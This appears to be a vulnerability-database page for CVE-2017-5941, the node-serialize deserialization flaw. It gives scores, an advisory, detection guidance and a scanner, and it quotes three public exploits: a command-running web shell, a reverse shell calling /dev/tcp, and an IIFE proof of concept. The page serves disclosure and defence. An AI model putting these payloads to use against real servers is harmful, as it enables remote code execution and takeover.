CVE-2017-5941
Published 2017-02-09
Priority P2 · 77 · critical · 9.8 · CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 61.02% (99.0th percentile)
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| node-serialize_project | node-serialize | <= 0.0.4 | — |
| node-serialize_project | node-serialize | 0 – 0.0.4 | — |
Detection & IOCs (extracted from sources)
- Detect the IIFE marker string `_$$ND_FUNC$$_` in serialized input: its presence in data passed to `unserialize()` is the direct trigger for arbitrary code execution.
- Inspect HTTP cookies (especially a cookie named `profile`) for base64-encoded payloads that decode to JSON containing the `_$$ND_FUNC$$_` prefix; this is the exploit delivery mechanism observed in the wild.
- Monitor for Node.js processes unexpectedly opening listening TCP sockets (e.g. on port 443) via `http.createServer().listen()`, the web-shell persistence mechanism used in exploit variant 3.
- Flag JSON objects containing the key `webShell` or `rce` with values prefixed by `_$$ND_FUNC$$_`, since these are the payload field names used across multiple public exploit variants.
- The exploit only triggers when the `_$$ND_FUNC$$_` marker is present AND the function is immediately invoked (IIFE pattern with a trailing `()`); serialized functions without the invocation suffix are not directly executed on deserialization.
- The vulnerability is specific to node-serialize version 0.0.4; detections and mitigations should be scoped to environments running this exact package version.
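The detection logic the bullets above describe, written out as an added example (not code from the advisory, the exploits or the node-serialize package): it parses a serialized document or a base64 `profile`-style cookie, reports every string carrying the `_$$ND_FUNC$$_` marker together with its JSON path, and records whether the trailing `()` that turns it into an IIFE is present. The cookie handling, the helper names and the sample payloads are constructed for the example.

```javascript
// Added example: defender-side scanner for the node-serialize IIFE marker.
// It never calls unserialize(); it only inspects the data with JSON.parse.
const MARKER = '_$$ND_FUNC$$_';
// Matches a serialized function body that ends in "}()" (optionally with
// whitespace or a ';'), i.e. the immediately-invoked form that unserialize()
// would execute. A bare "function (){...}" does not match.
const IIFE_SUFFIX = /\}\s*\(\s*\)\s*;?\s*$/;

// Recursively walk a parsed JSON value and collect marker findings.
function scanValue(value, path, findings) {
  if (typeof value === 'string') {
    if (value.startsWith(MARKER)) {
      findings.push({ path, invoked: IIFE_SUFFIX.test(value) });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => scanValue(v, `${path}[${i}]`, findings));
  } else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      scanValue(v, path ? `${path}.${k}` : k, findings);
    }
  }
}

// Scan a raw serialized string. Returns null when the input is not JSON so a
// caller can treat "unparseable" as its own signal; otherwise a findings list.
function scanSerialized(raw) {
  let doc;
  try { doc = JSON.parse(raw); } catch (e) { return null; }
  const findings = [];
  scanValue(doc, '', findings);
  return findings;
}

// Cookie delivery form from the write-ups: base64 of the serialized JSON.
function scanBase64Cookie(cookieValue) {
  const raw = Buffer.from(cookieValue, 'base64').toString('utf8');
  return scanSerialized(raw);
}

// Constructed samples (harmless bodies): the IIFE form, which unserialize()
// would run, and the bare-function form, which is stored but not invoked.
const iifePayload = JSON.stringify({ rce: `${MARKER}function (){ return 1 }()` });
const bareFunction = JSON.stringify({ cb: `${MARKER}function (){ return 1 }` });
const profileCookie = Buffer.from(iifePayload).toString('base64');

console.log(scanSerialized(iifePayload));     // [{ path: 'rce', invoked: true }]
console.log(scanSerialized(bareFunction));    // [{ path: 'cb', invoked: false }]
console.log(scanBase64Cookie(profileCookie)); // [{ path: 'rce', invoked: true }]
```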
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
GHSA
Code Execution through IIFE in node-serialize
ghsa·2018-07-18 · CVE-2017-5941 [CRITICAL] CWE-502
Affected versions of `node-serialize` can be abused to execute arbitrary code via an [immediately invoked function expression](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) (IIFE) if untrusted user input is passed into `unserialize()`.
## Recommendation
There is no direct patch for this issue. The package author has reviewed this advisory, and provided the following recommendation:
```
To avoid the security issues, at least one of the following methods should be taken:
1. Make sure to send serialized strings internally, isolating them from potential hackers. For example, only sending the strings from backend to frontend and always using HTTPS instead of HTTP.
2. Introduce public-key cryptosystems (e.g. RSA) to ens
```
OSV
Code Execution through IIFE in node-serialize
osv·2018-07-18 · CVE-2017-5941 [CRITICAL]
No detection rules found.
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution (3)
exploitdb·2021-06-18 · CVE-2017-5941
---
```javascript
// Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3)
// Date: 17.06.2021
// Exploit Author: Beren Kuday GORUN
// Vendor Homepage: https://github.com/luin/serialize
// Software Link: https://github.com/luin/serialize
// Version: 0.0.4
// Tested on: Windows & Ubuntu
// CVE : 2017-5941
var serialize = require('node-serialize');
var payload = {
"webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()"
}
serialize.u
```
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution (2)
exploitdb·2021-02-10 · CVSS 9.8 · CVE-2017-5941 [CRITICAL]
---
```python
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941
import requests
import re
import base64
import sys
url = 'http://192.168.100.133:8000/' # change this
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
"return function () {"
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
"console.log('still inside');"
"const { exec } = require('child_process');"
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
"}"
"})(require('http').ServerResponse.prototype.en
```
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution
exploitdb·2017-02-08 · CVE-2017-5941
---
```javascript
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
```
References
- http://packetstormsecurity.com/files/161356/Node.JS-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/163222/Node.JS-Remote-Code-Execution.html
- http://www.securityfocus.com/bid/96225
- https://nodesecurity.io/advisories/311
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/